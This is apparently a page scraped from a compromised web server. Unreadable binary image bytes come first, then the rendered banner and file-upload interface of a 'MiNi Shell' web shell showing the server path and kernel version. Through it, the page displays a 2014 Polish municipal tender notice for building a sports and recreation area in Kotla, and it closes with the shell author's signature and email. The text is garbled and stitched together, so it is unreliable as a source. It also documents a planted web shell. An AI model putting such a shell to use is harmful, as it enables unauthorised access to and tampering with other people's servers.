JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140213/51692-N-2014.html

<p class="kh_header"><b>Kotla: Zagospodarowanie terenu rekreacyjnego i doposażenie boiska sportowego w Kotli</b><br>
<b>Numer ogłoszenia: 51692 - 2014; data zamieszczenia: 13.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kotla , ul. Głogowska 93, 67-240 Kotla, woj. dolnośląskie, tel. 076 8318361, faks 076 8318308.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu rekreacyjnego i doposażenie boiska sportowego w Kotli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie przedmiotu zamówienia jest:
a) budowa budynku zaplecza sportowego-szatnie wraz z wyposażeniem: budynek w konstrukcji lekkiej drewnianej szkieletowej o wym. zewn. 13,86 x 8,13 m; dach dwuspadowy kryty blachodachówką gr. 0,5 mm powlekana materiałem grubowarstwowym z warstwą lakieru zewnętrznego grafit na łatach drewnianych ocieplony wełną mineralną gr. 18 cm; stolarka okienna PCV z profili 5-komorowych, parapety wewn. i zewn. PCV; drzwi wewn. płytowe pełne wraz z gotowymi ościeżnicami drewnianymi, 3 zawiasy; drzwi zewn. PCV z profili 5-komorowych z szybą bezpieczną, wkładka patentowa, klamka metalowa, samozamykacz, 3 zawiasy; tynki zewn. silikatowe lub silikatowo-silikonowe, cokół z płytek klinkierowych; tynki wewnętrzne z płyt g-k. malowane akrylową farbą lateksową, w pomieszczeniach mokrych glazura do wys. 2,1m; posadzki płytki gresowe i  wykładzina PCV typu Tarkett lub równoważna; instalacja wodociągowa z rur polipropylenowych z wkładką aluminiową o 40÷16; instalacja kanalizacyjna z rur PVC o 160-50; instalacja ogrzewania elektrycznego - grzejniki konwektorowe z wymuszonym obiegiem, sterowane programatorem tygodniowym; wentylacja pomieszczeń - wentylatory ścienne i sufitowe; rozdzielnia główna TG1, instalacja elektryczna oświetlenia oprawy rastrowe 4x18W, 2x18W i żarowe ze świetlówkami energooszczędnymi, nad wejściem typu kinkiet, w wybranych oprawach moduł awaryjny; instalacja gniazd wtykowych, siłowa i sterownicza, podgrzewacz cwu o poj. 300 l; armatura biała, miski ustępowe, umywalki wiszące naścienne, brodziki natryskowe na stopkach, baterie stojące z mieszaczem; 
b) budowa budynku sanitariatów ogólnodostępnych: budynek w konstrukcji lekkiej drewnianej szkieletowej o wym. zewn. 6,0 x 6,0 m; dach dwuspadowy kryty blachodachówką gr. 0,5 mm powlekana materiałem grubowarstwowym z warstwą lakieru zewnętrznego grafit na łatach drewnianych ocieplony wełną mineralną gr. 18 cm; stolarka okienna PCV z profili 5-komorowych, parapety wewn. i zewn. PCV; drzwi wewn. płytowe pełne wraz z gotowymi ościeżnicami drewnianymi bez progów, 3 zawiasy, samozamykacz; drzwi zewn. PCV z profili 5-komorowych otwierane na zewnątrz, wkładka patentowa, klamka metalowa, samozamykacz, 3 zawiasy; tynki zewn. silikatowe lub silikatowo-silikonowe, cokół z płytek klinkierowych; tynki wewnętrzne z płyt g-k malowane akrylową farbą lateksową, w pomieszczeniach mokrych glazura do wys. 2,1m; posadzki gresowe; instalacja wodociągowa z rur PE80 PEHD o32 SDR 17 PN10, instalacja kanalizacyjna z rur PVC-u o160; instalacja ogrzewania elektrycznego - grzejniki konwektorowe z wymuszonym obiegiem, sterowane programatorem tygodniowym; wentylacja pomieszczeń - wentylatory ścienne i sufitowe; rozdzielnia główna TG2, instalacja elektryczna oświetlenia oprawy żarowe ze świetlówkami energooszczędnymi, nad wejściem typu kinkiet; instalacja gniazd wtykowych, siłowa i sterownicza, podgrzewacz cwu o poj. 80 l; armatura biała, miski ustępowe, umywalki wiszące naścienne, brodziki natryskowe na stopkach; 
c) budowa wiaty drewnianej-rekreacyjnej: o wym. zewn. 10x15 m konstrukcja drewniana słupowo - ryglowa ze słupami pośrednimi, słupy drewniane 18x18 osadzone na stopach żelbetowych, dach dwuspadowy kryty blachodachówką gr. 0,5 mm powlekana materiałem grubowarstwowym z warstwą lakieru zewnętrznego grafit. 
d) budowa boiska do gier zespołowych o nawierzchni trawiastej: wielofunkcyjne o wymiarach użytkowych 40 x 20 m z zastosowaniem naturalnej nawierzchni trawiastej z wydzielonymi pasami wokół o wym. 2 m wzdłuż i 3 m za bramkami gdzie będą zamontowane piłkołapacze. Siew trawy na przygotowanym poprzez wymianę gruntu podłożu, wykonanie warstw filtracyjnych w tym systemu odwodnienia płyty z rur drenarskich o 65 mm do rury zbiorczej o 113 mm owiniętych geowłókniną poprzez studnie kontrolne o 450 do projektowanej studni magazynującej o 1500. Wykonanie dwóch piłko chwytów: o wym. 4x20m. z siatki polipropylenowej o oczkach 80x80 i gr. splotu 5 mm. na  linie stalowej montowanej na słupkach stalowych w rozstawie 2,5 m. Ogrodzenie płyty boiska i trybun: wys. 1,10 m, barierki stalowe z rur o 60,2 na słupkach z rur wypełnione siatką ocynkowaną z prętów o 5 mm - panel 3D z zamkniętym obrzeżem bez elementów ostrych z dwuskrzydłową furtką stalową o skrzydle 1,0x1,1 wypełnionym siatką ocynkowaną jw. - panel 3D z zamkiem i ogranicznikami zamknięcia. 
e) montaż sceny i trybun demontowalnych: scena demontowana, mobilna o wym. 5,0 x 6,0 m z łukowym zadaszeniem scenicznym, osłonięta z trzech stron siatką wiatroprzepuszczalną, spełniająca wszelkie kryteria bezpieczeństwa, konstrukcji aluminiowej na podwoziu stalowym zabezpieczonym przed korozją; trybuny demontowalne, przenośne, trzyrzędowe dla 76 osób o wym. 14,00x2,40 m konstrukcji ze stali ocynkowanej z balustradami.
f) budowa ciągów pieszo-jezdnych i placów utwardzonych: z kostki brukowej szarej na podsypce cementowo - piaskowej i podbudowie zgodnej z projektem wykonawczym, ograniczona krawężnikiem betonowym 30x15, 22x15 na ławie betonowej i obrzeżem 6x20 cm-zgodnie z rys.PZ3. 
g) budowa przyłącza wodociągowego, kanalizacji sanitarnej i deszczowej: wodociągowe od sieci o 90 z rur PE80 PEHD o32 SDR 17 PN10 ze studnią wodomierzową wyposażoną w zestaw wodomierzowy z zaworem antyskażeniowym typ EA Dn25. Na rurociągach zasilających instalacje wody do celów socjalno - bytowych zabudować filtr wody samopłuczący bezobsługowy z płukaniem wstecznym; kanalizacji sanitarnej od sieci o 200 z rur PVC-u o 160x4,7 mm klasy S układane na zagęszczonej podsypce piaskowej gr. 20 cm z obsypką wys. 30 cm z zagęszczeniem; kanalizacji deszczowej z rur PVC-u o 160x4,7 mm klasy S z dwoma wpustami ulicznymi, z zasypką i obsypką  jw. do projektowanej studni magazynującej Dn 1500. 
h) wlz i oświetlenie terenu:  linia kablowa YKY 5x25mm2 z szafki złączowo pomiarowej do projektowanej szafki rozdzielczej, zasilanie budynków kablem YKY 5x10mm2; oprawy oświetleniowe sodowe o mocy 100W na słupach oświetlenia zewnętrznego o wys. 4,5 m na prefabrykowanym fundamencie. Sterowanie oświetlenia astronomicznym zegarem sterującym i włącznikiem mechanicznym. 
i) pozostałe zagospodarowanie terenu: wycięcie drzew i karczowanie pni w obszarze objętym projektem; rozbiórka sceny między trybunami; likwidacja części nasypów poprzez przemieszczenie mas ziemnych pod projektowane boisko; montaż na stałe drewnianych ławek parkowych o wym. 192x55x76 cm na stelażu z rury giętej fi 60 mm ocynkowanej, malowanej proszkowo - 5 szt; montaż wykonanych z blachy ocynkowanej gr. 2 mm, ażurowych koszy parkowych na słupkach stalowych z kotwą, malowane proszkowo, opróżnianych przez obrót pojemnikiem - 3 szt; placyk gospodarczy jako filtracyjny usypany warstwą przepuszczalną i żwirem;  
j) roboty uzupełniające: wywiezienie gruzu z rozbiórek; niwelacja terenu poprzez przemieszczanie mas ziemnych, dowóz ziemi urodzajnej, wyrównanie i obsianie terenu trawą; wykonanie opasek o szer. 50 cm wzdłuż ścian budynków nie przylegających do ciągów pieszych jako filtracyjne usypane warstwą przepuszczalną i żwirem; dostawa i montaż furtki i bramy wjazdowej na teren rekreacyjny w istniejącym ogrodzeniu; dostawa i montaż tabliczek znamionowych na drzwi - 18 szt; dostawa krzeseł składanych - 100 szt, zewnętrznych plastikowych na stelażu stalowym; dostawa 14 kpl. zestawów składanych: stoły o wym: 220x60÷70x78 cm i 2 ławki z oparciem o wym: 220 x 25 x 86 cm (wys. siedziska ok. 48 cm), wykonanych z drewna lakierowanego proszkowo na stelażu metalowym;
k) wyposażenie budynku szatni: ławeczki z wieszakami ściennymi - 12 m, ławka z szafkami zamykanymi nadstawianymi - 3szt. stolik 80x80 - 3 szt. krzesła stalowe + pcv - 6 szt. lustro ścienne 1x2m, suszarki ścienne - 2 szt. uchwyt na papier toaletowy - 2 szt. 
l) wyposażenie budynku sanitariatów: lustro ścienne 1x2m - 2 szt. uchwyt na papier toaletowy - 5 szt. uchwyt na ręcznik papierowy - 3 szt. uchwyty dla osób niepełnosprawnych, prosty PP-50 - 1 szt. uchylny PUCH-70 - 1 szt. umywalkowy PUCH-60 - 2 szt. lustro uchylne 60x60 SNP - 1 szt. Szczegółowy zakres prac budowlanych określa: projekt wykonawczy, specyfikacja wykonania i odbioru robót budowlanych, projekt budowlany i pomocniczo przedmiar robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające mogą być udzielone do wysokości 20 procent wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.10.00-8, 45.23.32.00-1, 45.34.00.00-2, 45.23.13.00-8, 45.31.00.00-3, 45.31.61.00-6, 45.33.00.00-9, 39.00.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 20 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie. Spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi w zał. nr 4 do SIWZ, że wykonał (prace mają być zakończone i odebrane bez usterek przez inwestorów) minimum zadania w zakresie których było: zagospodarowanie terenów zielonych (boiska trawiaste) na kwotę 60 000 zł. netto, budowa obiektu kubaturowego na kwotę 120 000 zł. netto, nawierzchnie utwardzone kostką - na kwotę 50 000 zł. netto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie. Spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w zał. nr 5 do SIWZ, wykaże, że dysponuje: a) Kierownikiem robót budowlanych posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), b) Kierownikiem robót sanitarnych posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i  urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), c) Kierownikiem robót elektrycznych posiadającym uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli z informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej będzie wynikać iż wykonawca posiada środki finansowe lub zdolność kredytową nie mniejszą jak wartość złożonej oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy:
a) W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian tylko za zgodą Zamawiającego. b) Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. C) Zmiany istotnych postanowień umowy, o których mowa w ppkt. 1) muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 Ustawy stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza okreś1enie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.
2. Zmiany, o których mowa mogą dotyczyć: 
a) wystąpienia wyjątkowych okoliczności, niezależnych od Stron umowy, których nie mogły one przewidzieć w chwili zawierania umowy, wpływających na jej realizację, b) konieczności wykonania robót zamiennych, c) zmiany terminu realizacji zamówienia w przypadku wystąpienia robót zamiennych, dodatkowych lub uzupełniających, d) zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający.
3. Warunkiem dokonania zmian, o których mowa w ppkt. 2) powyżej jest złożenie pisemnego wniosku przez stronę inicjującą zmianę zawierającego: 
a) opis propozycji zmiany, b) uzasadnienie zmiany, c) obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, d) opis wpływu zmiany na termin wykonania przedmiotu zamówienia.
4. Dokonanie zmian, pod rygorem nieważności, wymaga podpisania aneksu do umowy. Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy: 
a) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy, b) zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego. Istnieje możliwość dokonania zmiany pracowników (załącznik nr 3 do SIWZ i oferty) jedynie za uprzednią pisemną zgodą Zamawiającego. 
5. Wykonawca z własnej inicjatywy proponuje zmianę pracowników w następ.  przypadkach: 
a) śmierci, choroby lub innych zdarzeń losowych; b) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy. W przypadku zmiany pracownika, nowa osoba powołana do pełnienia ww. obowiązków musi spełnić wymagania okreś1one w specyfikacji istotnych warunków zamówienia dla danej funkcji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kotla.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kotla, ul. Głogowska 93, 670-240 Kotla.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 10:00, miejsce: Urząd Gminy Kotla, ul. Głogowska 93, 670-240 Kotla.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana jest w ramach działania Odnowa i rozwój wsi objętego 
Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com